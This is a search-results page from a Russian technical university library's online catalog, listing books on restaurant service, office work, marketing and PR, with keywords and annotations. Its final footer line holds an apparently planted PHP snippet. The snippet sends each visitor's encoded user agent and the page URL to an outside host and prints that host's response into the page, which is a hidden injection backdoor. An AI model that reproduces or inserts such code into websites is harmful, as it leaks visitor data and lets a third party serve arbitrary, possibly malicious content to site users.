Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

100 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Посетитель")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 13
1. 
Дейнеко, Олег Александрович. Современный организатор производства [Текст] / О. А. Дейнеко, 1984. - 172, [2] с.
2. 
Власов, Леонид Васильевич. Секретарь-помощник руководителя [Текст] / Л. В. Власов, 1989. - 108, [2] с.
3. 
Ахрапоткова Н. Б. Справочник официанта, бармена [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Н. Б. Ахрапоткова, 2005. - 270 с.
Ключевые слова 
ОФИЦИАНТ -- БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- ОБОРУДОВАНИЕ БАРА -- ПОСУДА СТОЛОВАЯ -- ПОСУДА фарфоровая -- ПОСУДА фаянсовая -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА металическая -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ИНВЕНТАРЬ для бара -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- МЕТРДОТЕЛЬ -- СОМЕЛЬЕ -- ПРАВИЛА САНИТАРНЫЕ В ОБЩЕПИТ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- МЕНЮ -- КАРТА ВИН -- КАРТА коктейлей -- ВИНО ВИНОГРАДНОЕ -- ВИНО красное -- ВИНО белое -- ВИНО розовое -- ВИНО французское -- ВИНО итальянское -- ВИНО испанское -- ВИНО Германии -- ВИНО Португалии -- ВИНО Австралии -- ВИНО Новой Зеландии -- ВИНО Южной Африки -- ХЕРЕС -- ПОРТВЕЙН -- ВЕРМУТ -- МАДЕРА -- МАРСАЛА -- ВИНО ликерное -- ВИНО игристое -- ШАМПАНСКОЕ -- ВОДКА -- ВИСКИ -- КОНЬЯК -- БРЕНДИ -- ДЖИН -- РОМ -- ТЕКИЛА -- ЛИКЕР -- НАСТОЙКА -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПИВО -- ЧАЙ -- КОФЕ -- ОБСЛУЖИВАНИЕ в зале ресторане -- ПОСЕТИТЕЛь ресторана -- РЕЗЕРВИРОВАНИЕ столиков -- НАПИТОК СМЕШАННЫЙ -- КОКТЕЙЛЬ -- ОБСЛУЖИВАНИЕ в баре -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- БАНКЕТ "буфет-коктейль" -- ОБСЛУЖИВАНИЕ туристов -- ТУР -- ПИТАНИЕ туристов -- СТОЛ ШВЕДСКИЙ -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЫНОК ресторанных услуг -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ПОМОЩЬ ПЕРВАЯ МЕДИЦИНСКАЯ -- СЛОВАРЬ барных терминов -- СЛОВАРЬ дегустаторских терминов
Держатели документа (Информация об экземплярах) 
4. 
Пасько, Ольга Владимировна. Организация обслуживания на предприятиях общественного питания [Электронный ресурс] / О. В. Пасько, Н. В. Бураковская, Е. В. Кулагина, 2014. - 1 r=on-line. - 210 с.
Держатели документа (Информация об экземплярах) 

Целью написания данного труда является формирование у студентов знаний специфики, особенностей организации сервисного обслуживания на предприятиях общественного питания, функционирующих при гостиницах и иных средствах размещения.

В пособии дана характеристика типов предприятий общественного питания, изложен процесс информационного сопровождения предоставления услуг питания, показаны особенности разных форм и методов обслуживания клиентов, описаны перспективные направления развития сервиса и услуг общественного питания.

Пособие разработано в соответствии с рабочей программой подготовки студентов направления 100100.62 "Гостиничное дело", профиля подготовки "Ресторанная деятельность" и адресовано студентам дневной и заочной форм обучения.

Полный текст
5. 
Советник. - Журнал, 2004г. № 5
Оглавление 
  • Рыдзак, Вальдемар. Другого нет у нас пути / В. Рыдзак. - с.1
  • Моисеева, Вероника. Где будет Восток, когда Россия повернется на Запад / В. Моисеева. - с.4-5
  • Савицка, Вита. Что день грядущий нам готовит... / В. Савицка. - с.6-7
  • Шиллингер, Аттилла. Новые времена на перекрестке Востока и Запада / А. Шиллингер. - с.7-8
  • Туросы, Габор. Кто виноват в том, что клиент не всегда прав? / Г. Туросы. - с.9-10
  • Тренбецкий, Яцек. Пиарщики в Польше - масонская ложа наших дней? / Я. Тренбецкий, В. Рыдзак. - с.12-13
  • Йонкус, Артурас. Популярная профессия с плохим имиджем / А. Йонкус. - с.13-14
  • Кучера, Павел. Чешский опыт / П. Кучера, Л. Раймондова. - с.15
  • Зорая, Лиляна. Prофилактика политических кризисов / Л. Зорая. - с.16-17
  • Пашенцев, Евгений. Право на жизнь в Болгарии / Е. Пашенцев. - с.20-23
  • Кулабухов, Юрий. Беларусь: сквозь заповедные тернии к PR / Ю. Кулабухов. - с.23-25
  • Каспер, Генри. Штиль на эстонском рынке PR / Г. Каспер, Я. Магги. - с.26-28
  • Кяэн, Тоомас. Далеко ли до Питера? / Т. Кяэн. - с.28
  • Златева, Минка. Когда созрели условия / М. Златева. - с.36-37
  • Якутене, Диана. PR-специалисты в Литве: профессионалы или любители? / Д. Якутене. - с.38-39
  • Зорая, Лиляна. Иллюзия в образе PR / Л. Зорая, В. Филипович, А. Бован. - с.40-41
  • Улановский, Роман. PR на постконфликтном пространстве / Р. Улановский. - с.42-45
  • Венжик, Войтек. Продать дыхание Ленина / В. Венжик. - с.46-47
  • Кошелюк, Мирослав. PR-специалисты России, Латвии и Украины объединились в консорциум "Репутация регионов" / М. Кошелюк, А. Ротовский, К. Розенвалдс. - с.48-49
  • Коган, Евгения. Кто ты, посетитель Портала Sovetnik. ru? / Е. Коган. - с.53-54
Держатели документа (Информация об экземплярах) 
6. 
Харрисон, Джон. Организация работы секретаря учреждения [Текст] / Дж. Харрисон ; сокр. пер. с англ. Н. В. Симонова ; авт. предисл. В. М. Костиков, 1985. - 115, [2] с.
Держатели документа (Информация об экземплярах) 
7. 
Харрисон, Джон. Организация работы секретаря учреждения [Текст] / Дж. Харрисон ; пер. с англ. Н. В. Симонова ; авт. предисл. В. М. Костиков, 1982. - 125, [2] с.
Держатели документа (Информация об экземплярах) 
8. 
Барановский, Виктор Александрович. Официант-бармен [Текст] : Учеб. пособие для нач. проф. образования / В. А. Барановский, Л. В. Кулькова, 2001. - 346, [1] с.
Держатели документа (Информация об экземплярах) 

Эта книга - ответ на запрос времени. Современное российское общественное питание претерпевает существенные изменения, в результате которых формируются новые предприятия, в которых клиент должен быть обслужен по европейским стандартам.

Для этого нужны другие официанты, другие бармены - люди, определяющие лицо фирмы. Как стать таким, как соответствовать новым требованиям? Об этом рассказывается в нашей книге.

9. 
Тейлор, Клэр. Основы делопроизводства в современном бизнесе [Текст] : Пер. с англ. / К. Тейлор, 1997. - 173 с.
Держатели документа (Информация об экземплярах) 
10. 
Мазилкина, Елена Ивановна. Маркетинг в отраслях и сферах деятельности [Текст] : учебник / Е. И. Мазилкина, 2008. - 298, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ПРОМЫШЛЕННОСТЬ -- ПРЕДПРИЯТИЕ -- СТРАТЕГИЧЕСКИЙ -- ОПТОВАЯ -- РОЗНИЧНАЯ -- ТОРГОВЛЯ -- МАГАЗИН -- ТОРГОВОЕ -- ОБОРУДОВАНИЕ -- ТУРИЗМ -- СЕГМЕНТАЦИЯ -- РЫНОК -- СТАНДАРТИЗАЦИЯ -- СЕРТИФИКАЦИЯ -- ГОСТИНИЧНЫЙ -- БИЗНЕС -- ГОСТИНИЦА -- ОБЩЕСТВЕННОЕ -- ПИТАНИЕ -- ОБСЛУЖИВАНИЕ -- ПОСЕТИТЕЛЬ -- ИНДУСТРИЯ -- РАЗВЛЕЧЕНИЕ -- ТЕАТР -- КЛУБНАЯ -- ДЕЯТЕЛЬНОСТЬ -- ДИСКОТЕКА -- ИНФРАСТРУКТУРА -- ВНЕШНЕЭКОНОМИЧЕСКАЯ -- ПАРТНЕР -- МЕЖДУНАРОДНЫЙ -- БАНК -- КОММУНИКАЦИОННАЯ -- ПОЛИТИКА -- СТРОИТЕЛЬСТВО -- ТОВАР -- СБЫТ -- СТРОИТЕЛЬНАЯ -- ПРОДУКЦИЯ -- АГРОБИЗНЕС -- НАРОДНЫЙ -- ПРОМЫСЕЛ -- АГРОМАРКЕТИНГ
Держатели документа (Информация об экземплярах) 

В учебнике рассматриваются основные направления осуществления маркетинга в разных отраслях и сферах деятельности. Особое внимание уделяется проведению маркетинговых исследований, изучению и сегментации рынка, реализации маркетинговых коммуникаций в зависимости от выбранной сферы деятельности. В учебнике приводятся вопросы для самоконтроля и практические ситуации для закрепления изученного материала.

11. 
Парамонова, Татьяна Николаевна. Мерчандайзинг [Текст] : учеб. пособие для вузов по специальности "Маркетинг" / Т. Н. Парамонова, И. А. Рамазанов, 2010. - 142, [1] с.

Рассматривается формирование стратегий мерчандайзинга розничного торгового предприятия с учетом особенностей природной системы человека. Подробно анализируются подходы к внедрению технологий мерчандайзинга, методы продажи товаров, принципы планировки торгового зала и выкладки товаров.

12. 
Розанова, Надежда Михайловна. Микроэкономика. Руководство для будущих профессионалов [Электронный ресурс] : учеб. для вузов по направлению "Экономика" для бакалавров / Н. М. Розанова, 2012. - 1 o=эл. опт. диск (DVD-ROM). - [985] с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебнике всесторонне, детально и глубоко анализируются все темы современной микроэкономики как фундамента экономического образования самого высокого уровня. Изложение материала дается в увлекательной форме по оригинальной методике автора. Теоретические положения иллюстрируются бизнес-примерами, образцами решения задач и направлениями исследовательской работы. Теория и практические задания ранжируются по степени сложности, от простых, доступных тому, кто сталкивается с экономикой впервые, до продвинутых, анализ которых будет интересен хорошо подготовленному читателю.

Для студентов экономических специальностей (бакалавров и магистров), а также аспирантов, молодых исследователей, научных работников.

13. 
Рафел М. Как завоевать клиента [Текст] / М. Рафел, Н. Рафел, 1996. - 345 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2996 - 23.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.20 с.14 запросов, 0.57c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;